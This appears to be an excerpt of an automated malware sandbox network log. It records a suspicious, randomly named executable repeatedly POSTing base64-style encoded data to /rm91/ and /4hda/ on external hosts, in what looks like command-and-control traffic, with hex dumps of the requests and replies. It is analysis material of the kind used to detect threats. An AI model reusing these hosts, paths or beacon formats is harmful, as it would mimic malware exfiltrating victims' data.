                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Data Raw: 61 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                  Data Ascii: a19f<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="c
                                  Jul 13, 2024 00:08:25.762561083 CEST | 224 | IN | Data Raw: 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 72 6f 74 6f 3d 22 68 74 74 70 73 3a 22 7d 69 66 28 21
                                  Data Ascii: dn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT",
                                  Jul 13, 2024 00:08:25.762598991 CEST | 1236 | IN | Data Raw: 22 52 4f 22 2c 22 42 47 22 2c 22 45 54 22 2c 22 45 4c 22 2c 22 47 41 22 2c 22 48 52 22 2c 22 4c 56 22 2c 22 4c 54 22 2c 22 4d 54 22 2c 22 4e 4c 22 2c 22 50 4c 22 2c 22 53 56 22 2c 22 53 4b 22 2c 22 53 4c 22 2c 22 43 53 22 2c 22 48 55 22 2c 22 52
                                  Data Ascii: "RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR","ZH","TR","UK","AR","BS"];if("cmp_customlanguages" in window){for(var a=0;a<window.cmp_customlanguages.length;a++){b.push(window.cmp_customlanguages[a].l
                                  Jul 13, 2024 00:08:25.762635946 CEST | 187 | IN | Data Raw: 7d 69 66 28 22 75 73 65 72 4c 61 6e 67 75 61 67 65 22 20 69 6e 20 6e 61 76 69 67 61 74 6f 72 29 7b 63 2e 70 75 73 68 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 4c 61 6e 67 75 61 67 65 29 7d 76 61 72 20 68 3d 22 22 3b 66 6f 72 28 76 61 72 20 64
                                  Data Ascii: }if("userLanguage" in navigator){c.push(navigator.userLanguage)}var h="";for(var d=0;d<c.length;d++){var b=c[d].toUpperCase();if(g.indexOf(b)!=-1){h=b;break}if(b.indexOf("-")!=-1){b=b.sub
                                  Jul 13, 2024 00:08:25.762684107 CEST | 1236 | IN | Data Raw: 73 74 72 28 30 2c 32 29 7d 69 66 28 67 2e 69 6e 64 65 78 4f 66 28 62 29 21 3d 2d 31 29 7b 68 3d 62 3b 62 72 65 61 6b 7d 7d 69 66 28 68 3d 3d 22 22 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 64 65 66 61 75 6c 74 6c 61 6e 67 29
                                  Data Ascii: str(0,2)}if(g.indexOf(b)!=-1){h=b;break}}if(h==""&&typeof(cmp_getlang.defaultlang)=="string"&&cmp_getlang.defaultlang!==""){return cmp_getlang.defaultlang}else{if(h==""){h="EN"}}h=h.toUpperCase();return h};(function(){var u=document;var v=u.ge
                                  Jul 13, 2024 00:08:25.762717962 CEST | 1236 | IN | Data Raw: 6b 2b 22 2f 2f 22 2b 68 2e 63 6d 70 5f 68 6f 73 74 2b 22 2f 64 65 6c 69 76 65 72 79 2f 63 6d 70 2e 70 68 70 3f 22 2b 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 68 26 26 68 2e 63 6d 70 5f 69 64 3e 30 3f 22 69 64 3d 22 2b 68 2e 63 6d 70 5f 69 64 3a 22
                                  Data Ascii: k+"//"+h.cmp_host+"/delivery/cmp.php?"+("cmp_id" in h&&h.cmp_id>0?"id="+h.cmp_id:"")+("cmp_cdid" in h?"&cdid="+h.cmp_cdid:"")+"&h="+encodeURIComponent(g)+(c!=""?"&cmpdesign="+encodeURIComponent(c):"")+(f!=""?"&cmpregulationkey="+encodeURICompo
                                  Jul 13, 2024 00:08:25.762757063 CEST | 448 | IN | Data Raw: 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b
                                  Data Ascii: &u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("scri
                                  Jul 13, 2024 00:08:25.762871981 CEST | 1236 | IN | Data Raw: 73 70 6c 61 79 3a 6e 6f 6e 65 22 3b 69 66 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c 74 72
                                  Data Ascii: splay:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none"
                                  Jul 13, 2024 00:08:25.762901068 CEST | 224 | IN | Data Raw: 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65 7b 5f 5f
                                  Data Ascii: .push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",support
                                  Jul 13, 2024 00:08:25.763070107 CEST | 1236 | IN | Data Raw: 65 64 41 50 49 73 3a 5b 22 74 63 66 63 61 22 2c 22 75 73 6e 61 74 22 2c 22 75 73 63 61 22 2c 22 75 73 76 61 22 2c 22 75 73 63 6f 22 2c 22 75 73 75 74 22 2c 22 75 73 63 74 22 5d 2c 63 6d 70 49 64 3a 33 31 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f
                                  Data Ascii: edAPIs:["tcfca","usnat","usca","usva","usco","usut","usct"],cmpId:31}};window.cmp_gppstub=function(){var a=arguments;__gpp.q=__gpp.q||[];if(!a.length){return __gpp.q}var g=a[0];var f=a.length>1?a[1]:null;var e=a.length>2?a[2]:null;if(g==="ping
                                  Jul 13, 2024 00:08:25.772265911 CEST | 1236 | IN | Data Raw: 2e 63 6f 6d 6d 61 6e 64 2c 62 2e 70 61 72 61 6d 65 74 65 72 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 63 6d 70 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c
                                  Data Ascii: .command,b.parameter,function(h,g){var e={__cmpReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__uspapiCall" in c){var b=c.__uspapiCall;window.__uspapi(b.c


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  9 | 192.168.2.4 | 49746 | 43.252.167.188 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:39.497873068 CEST | 791 | OUT | POST /rm91/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--fhq1c541j0zr.com
                                  Origin: http://www.xn--fhq1c541j0zr.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 200
                                  Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 42 45 45 45 38 4f 65 58 67 67 4b 66 79 41 63 45 31 64 46 65 67 71 6e 77 43 46 69 53 34 59 6c 4a 77 3d 3d
                                  Data Ascii: tDA=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPBEEE8OeXggKfyAcE1dFegqnwCFiS4YlJw==
                                  Jul 13, 2024 00:08:40.429691076 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 12 Jul 2024 22:14:44 GMT
                                  Server: Apache
                                  Content-Length: 203
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  10 | 192.168.2.4 | 49747 | 43.252.167.188 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:42.029982090 CEST | 811 | OUT | POST /rm91/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--fhq1c541j0zr.com
                                  Origin: http://www.xn--fhq1c541j0zr.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 220
                                  Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4f 55 74 46 4d 57 66 37 6c 73 53 78 49 78 41 69 4e 77 71 43 45 7a 38 35 2f 37 7a 71 57 34 66 70 77 3d
                                  Data Ascii: tDA=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgOUtFMWf7lsSxIxAiNwqCEz85/7zqW4fpw=
                                  Jul 13, 2024 00:08:42.918051958 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 12 Jul 2024 22:14:46 GMT
                                  Server: Apache
                                  Content-Length: 203
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  11 | 192.168.2.4 | 49748 | 43.252.167.188 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:44.561718941 CEST | 10893 | OUT | POST /rm91/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--fhq1c541j0zr.com
                                  Origin: http://www.xn--fhq1c541j0zr.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 10300
                                  Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 30 57 66 78 51 41 41 6e 73 61 54 6d 65 51 32 6b 6f 4d 45 63 4a 38 62 43 38 2f 44 67 56 73 38 43 77 58 78 4c 69 46 32 61 36 37 62 74 66 66 39 34 41 56 65 53 50 64 45 43 76 35 70 6c 41 61 42 70 6a 49 2f 76 72 59 67 2f 49 35 4f 33 31 63 52 45 39 66 36 59 6b 35 62 4d 7a 51 72 2b 49 4a 37 58 54 4e 31 6d 4a 50 32 33 70 61 4e 65 70 68 2f 53 74 41 66 59 43 54 35 48 59 6d 32 35 59 6f 47 76 78 70 76 30 74 4e 64 74 51 43 72 43 55 39 62 61 31 55 6c 79 56 72 36 34 47 62 49 39 58 48 4c 69 7a 74 30 70 [TRUNCATED]
                                  Data Ascii: tDA= [TRUNCATED]
                                  Jul 13, 2024 00:08:45.422015905 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 12 Jul 2024 22:14:49 GMT
                                  Server: Apache
                                  Content-Length: 203
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  12 | 192.168.2.4 | 49749 | 43.252.167.188 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:47.099536896 CEST | 517 | OUT | GET /rm91/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.xn--fhq1c541j0zr.com
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Jul 13, 2024 00:08:47.967788935 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 12 Jul 2024 22:14:52 GMT
                                  Server: Apache
                                  Content-Length: 203
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  13 | 192.168.2.4 | 49750 | 194.9.94.85 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:53.091829062 CEST | 791 | OUT | POST /4hda/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--matfrmn-jxa4m.se
                                  Origin: http://www.xn--matfrmn-jxa4m.se
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 200
                                  Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 63 6e 30 59 73 41 46 43 66 32 35 4c 4b 39 55 74 59 5a 59 74 67 75 41 72 58 62 55 38 47 34 48 63 77 3d 3d
                                  Data Ascii: tDA=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2Xcn0YsAFCf25LK9UtYZYtguArXbU8G4Hcw==
                                  Jul 13, 2024 00:08:53.728615999 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:08:53 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/8.1.24
                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen 